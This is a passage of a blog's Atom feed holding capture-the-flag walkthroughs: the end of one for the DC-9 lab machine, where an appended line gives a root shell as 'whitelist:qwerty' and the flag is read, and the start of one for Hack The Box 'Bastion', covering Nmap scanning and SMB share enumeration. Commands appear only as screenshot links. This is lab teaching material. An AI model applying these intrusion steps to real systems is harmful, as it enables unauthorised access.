medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTXh7z_R42Mz4rYcdDmZRZItAFwmlSFhoIYsty8ahBkaJP3GsEwQpDotZ4dgCp-qtWtPAnCiw_NXCWWf58x-WTH0MyteuUZWBnNJPUzQH_v0aDrQzjjKwEOOKTKac5DtbOhexhk6FIJJH_/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;27&quot; data-original-width=&quot;759&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTXh7z_R42Mz4rYcdDmZRZItAFwmlSFhoIYsty8ahBkaJP3GsEwQpDotZ4dgCp-qtWtPAnCiw_NXCWWf58x-WTH0MyteuUZWBnNJPUzQH_v0aDrQzjjKwEOOKTKac5DtbOhexhk6FIJJH_/s16000/screenshot.49.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Checking that the line has been correctly appended:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0-jfMCTQe5Py9nri6e45i1SjZxbvyOg0lTltRHA2hIuv2cSmwZscBt5-XGBAJTfFT0Nk57VPP2aCPhmyjXHesm9DViVD9bYF126hL4XU2r4bgpBdlw-cbxeFi7iid-Yq5cNReW_F5vhch/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;26&quot; data-original-width=&quot;760&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0-jfMCTQe5Py9nri6e45i1SjZxbvyOg0lTltRHA2hIuv2cSmwZscBt5-XGBAJTfFT0Nk57VPP2aCPhmyjXHesm9DViVD9bYF126hL4XU2r4bgpBdlw-cbxeFi7iid-Yq5cNReW_F5vhch/s16000/screenshot.50.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDj7poFL0-B15xBS9O2MRWryRRvZV8sa16mKcBL2TK2NAeWsiqeNm87dipCPkd7vx4eBq0ZUAMfUMRf45zFLJK2nhuGPIhrOMzMfilV-9vbCbqZVhhq1CtkujBCXwXcwaLBDZBiXtDjYa7/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;25&quot; data-original-width=&quot;732&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDj7poFL0-B15xBS9O2MRWryRRvZV8sa16mKcBL2TK2NAeWsiqeNm87dipCPkd7vx4eBq0ZUAMfUMRf45zFLJK2nhuGPIhrOMzMfilV-9vbCbqZVhhq1CtkujBCXwXcwaLBDZBiXtDjYa7/s16000/screenshot.51.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Logging as &lt;b&gt;whitelist:qwerty&lt;/b&gt; we have a root shell:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXzbUQESu6goBpQA1mMf7gQ8PpgLO-O273sleBHzeBs1tjZONU80YSOEvLg49qHMWEnF47nJUdDbJswK9j-eZnN_b9Dq7pQ0mB3URmCFfZR-DsY5-TknQiL-03UYqVPaQi0IKHaNOup51O/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;94&quot; data-original-width=&quot;542&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXzbUQESu6goBpQA1mMf7gQ8PpgLO-O273sleBHzeBs1tjZONU80YSOEvLg49qHMWEnF47nJUdDbJswK9j-eZnN_b9Dq7pQ0mB3URmCFfZR-DsY5-TknQiL-03UYqVPaQi0IKHaNOup51O/s16000/screenshot.52.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;5 - CAPTURING THE FLAG&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;theflag.txt:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYKM-m74YLlmGjSzQZ8pbQqoE8k0JiKkQXALjgbDIwh7fm2Yml1t5KibH0koB9w3v5fbIqY3IXRLRyMqFVZ95FmYyq-I1mO9kcCoZlgtYZgyxnV-tQ5LRbRuZTYFlD7AMqA7CrY4dYpNbo/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;592&quot; data-original-width=&quot;885&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYKM-m74YLlmGjSzQZ8pbQqoE8k0JiKkQXALjgbDIwh7fm2Yml1t5KibH0koB9w3v5fbIqY3IXRLRyMqFVZ95FmYyq-I1mO9kcCoZlgtYZgyxnV-tQ5LRbRuZTYFlD7AMqA7CrY4dYpNbo/s16000/screenshot.53.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;p&gt;&lt;/p&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/4403026298744482641'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/4403026298744482641'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2021/11/dc-9.html' title='DC-9'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEqqeQYSWvZo24b4B7N9KxpEXdkV3QXHxlG8ORPbO6KUckc3i-YT2jmBnZTyCTCyCkRGvXzjEfeWryYjHu2uxygyNgqlHUoan57cIZeEll4WLpx-HtCW_3oKvuG23YxbR81j8aBya5vx36/s72-c/screenshot.13.jpg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-7184651924679252932</id><published>2019-07-31T23:00:00.000-05:00</published><updated>2019-09-07T20:18:57.578-05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>Bastion</title><content type='html'>&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;BASTION&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZmQ5mgMgMEhENTG9bVnYdz63C_o3vxHCijpLxZc_Sarc1xdkF41t0cJFgUl5jq173y_csJkd-OqCkyF5FjnPjFnWQqdfPlVh0vlGshKQ-IlS1SmVBZjPQxCmTfC2CI_c5MMsTF7xSejqH/s1600/screenshot.50.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZmQ5mgMgMEhENTG9bVnYdz63C_o3vxHCijpLxZc_Sarc1xdkF41t0cJFgUl5jq173y_csJkd-OqCkyF5FjnPjFnWQqdfPlVh0vlGshKQ-IlS1SmVBZjPQxCmTfC2CI_c5MMsTF7xSejqH/s1600/screenshot.50.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;1 - INTRODUCTION&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- The goal for this exercise is to develop a hacking process for the vulnerable machine &lt;b&gt;Bastion&lt;/b&gt; from Hack The Box pentesting platform:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://www.hackthebox.eu/&quot;&gt;https://www.hackthebox.eu/&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;color: #3d85c6; font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;b&gt;2 - ENUMERATION&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- &lt;b&gt;Bastion&lt;/b&gt;&#39;s IP is 10.10.10.134:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzglFVVoD-YGo6TY1HIxHsg1xsMWkRBMA9Oe4s_nxFtgdsjrXhulsNXSsuDC5KQXMJAoEQbOuk5v23K-ekwyg36LoH3SqWQJpHgZNHnE9IcFN16S-u_KBMt3vdVMSpurjZ8uio4Qin0pMQ/s1600/screenshot.2.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzglFVVoD-YGo6TY1HIxHsg1xsMWkRBMA9Oe4s_nxFtgdsjrXhulsNXSsuDC5KQXMJAoEQbOuk5v23K-ekwyg36LoH3SqWQJpHgZNHnE9IcFN16S-u_KBMt3vdVMSpurjZ8uio4Qin0pMQ/s400/screenshot.2.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Scanning with Nmap there are four open ports: 22, 135,139 and 445.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt0x29NY_vnhW4T0IBLxRtseqlMVIBXU5swmRL5VSM3x9DcRFCg1lefWZpPYflzCnfyIog-AYFwHI5OrHEIhIJANTZGSXBF3nwPn4Cn7IbdVTyfddpYO4cN8UGlAiVt6Irj0FgTDy8DLEi/s1600/screenshot.3.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgt0x29NY_vnhW4T0IBLxRtseqlMVIBXU5swmRL5VSM3x9DcRFCg1lefWZpPYflzCnfyIog-AYFwHI5OrHEIhIJANTZGSXBF3nwPn4Cn7IbdVTyfddpYO4cN8UGlAiVt6Irj0FgTDy8DLEi/s1600/screenshot.3.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Scanning deeper those four ports it seems that we have an SMB service running on port 445:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXZ7TZFVf0rpYwg7Hqq_KiqCgzwULZzJrP7zTE_uZU6Gedq2ZeJKjA4d4AkwK2X2DwyCVmzA_6tqoiEM9Xat5-I-87XlJhamt0Cs7aXoOrgFEaEClkZsjIDK0EBt7iMTpa80PKpPIsIQuM/s1600/screenshot.4.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXZ7TZFVf0rpYwg7Hqq_KiqCgzwULZzJrP7zTE_uZU6Gedq2ZeJKjA4d4AkwK2X2DwyCVmzA_6tqoiEM9Xat5-I-87XlJhamt0Cs7aXoOrgFEaEClkZsjIDK0EBt7iMTpa80PKpPIsIQuM/s1600/screenshot.4.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidUZkYTn76lnB8cHvkIYzGaRIv-s6MWE8DtCmH6QIyt__RPIqJViaNUgC0nOefsCkkCEBXx8bJKpUFfme41ppPTgUqsMMx4fftFUl0c7HCNIeID9-ceG2xSp1a8Vw6q7s_XTq6HJKswmld/s1600/screenshot.5.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidUZkYTn76lnB8cHvkIYzGaRIv-s6MWE8DtCmH6QIyt__RPIqJViaNUgC0nOefsCkkCEBXx8bJKpUFfme41ppPTgUqsMMx4fftFUl0c7HCNIeID9-ceG2xSp1a8Vw6q7s_XTq6HJKswmld/s1600/screenshot.5.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- This Nmap script enumerates the four shared folders:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6y5g_6RZqesFwBk2bcxMCwJtknm2nLjW9UcW0SvzzzOxdHqX7C4HCuPrzOxRqFEsv6TDaADSqsbQwJhcrTwwS-cA7QxtJN1OCQCuaMMfEVZMtaK6D5fliSswE_9_r8vb78hWdDJ5khLtU/s1600/screenshot.49.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6y5g_6RZqesFwBk2bcxMCwJtknm2nLjW9UcW0SvzzzOxdHqX7C4HCuPrzOxRqFEsv6TDaADSqsbQwJhcrTwwS-cA7QxtJN1OCQCuaMMfEVZMtaK6D5fliSswE_9_r8vb78hWdDJ5khLtU/s1600/screenshot.49.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- Connecting with &lt;/span&gt;&lt;b style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;smbclient:&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxJoJqfPZPyBkAr5lCtIP-3g2jK6uqyjv4x3a-18I73L09H5MghMuasxFGt2m-TfCNfyQ5yhPvH0ATOoGujuEWf7ypzIXW2wRwO04ZyIJWTnnocgBJ4dgA9zVaD6S6mo47y9XLF710Z8nF/s1600/screenshot.9.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxJoJqfPZPyBkAr5lCtIP-3g2jK6uqyjv4x3a-18I73L09H5MghMuasxFGt2m-TfCNfyQ5yhPvH0ATOoGujuEWf7ypzIXW2wRwO04ZyIJWTnnocgBJ4dgA9zVaD6S6mo47y9XLF710Z8nF/s1600/screenshot.9.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;- As expected, both &lt;b&gt;ADMIN$&lt;/b&gt; and &lt;b&gt;C$&lt;/b&gt; are not accessible:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6TednHllxW2Q7PqruD0sy8hHaL51wNRTOkM4WhXkqtHpXIaIVcghErdPgBywojq-b3rp6KLFne38uFrNla22sj_dT5GKyZvrVTc59LPVrVwianY2lrML2_uEu-l0nkKlYOmRCQtCtLMrf/s1600/screenshot.10.jpg&quot; imageanchor=&quot;1&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6TednHllxW2Q7PqruD0sy8hHaL51wNRTOkM4WhXkqtHpXIaIVcghErdPgBywojq-b3rp6KLFne38uFrNla22sj_dT5GKyZvrVTc59LPVrVwianY2lrML2_uEu-l0nkKlYOmRCQtCtLMrf/s1600/screenshot.10.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-family: &amp;quot;arial&amp;quot; , &amp;quot;helvetica&amp;quot; , sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
